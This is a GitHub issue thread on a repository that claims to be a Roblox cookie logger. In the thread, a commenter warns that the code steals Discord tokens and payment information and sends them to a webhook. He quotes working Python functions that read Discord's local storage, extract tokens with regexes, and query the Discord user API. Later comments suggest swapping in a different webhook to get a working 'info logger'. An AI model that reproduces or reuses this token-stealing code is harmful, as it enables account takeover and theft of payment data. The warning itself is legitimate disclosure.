VlOLENTMINCE / ROBLOX-COOKIE-LOGGER-PYTHON

Have Pyhon3 installed install the zip file from here and extract it to desktop then run the python file it’ll install everything for you and start it up
3 stars 9 forks source link

Discord Info Logger #1

Open HuskyCodez opened 4 years ago

HuskyCodez commented 4 years ago

First of all, look at the code below, it litterally grabs ur discord token and followed by that it also logs your payment info and sends it via a webhook, also nice skidding bro 👍

def getheaders(token=None, content_type="application/json"): headers = { "Content-Type": content_type, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11" } if token: headers.update({"Authorization": token}) return headers def getuserdata(token): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode()) except: pass def gettokens(path): path += "\Local Storage\leveldb" tokens = [] for file_name in os.listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"): for token in findall(regex, line): tokens.append(token) return tokens

PogScriptR commented 3 years ago

Imagine having no life and making a python discord logger LMAO

deman2660 commented 3 years ago

i mean if u change out the webhook u got yourself a great discord info logger😎

PogScriptR commented 3 years ago

i mean if u change out the webhook u got yourself a great discord info logger😎

My man, you are 30 parallel universes ahead of humanity

ghost commented 3 years ago

LOL skid.

Vincent2212 commented 3 years ago

Lol he didn't even make this its skidded.

nedizin commented 2 years ago

nt dumbass

aceelnar2 commented 2 years ago

we

kirb22 commented 2 years ago

just change the webhook

BenJatsu commented 2 years ago

I spammed the webhook LMAO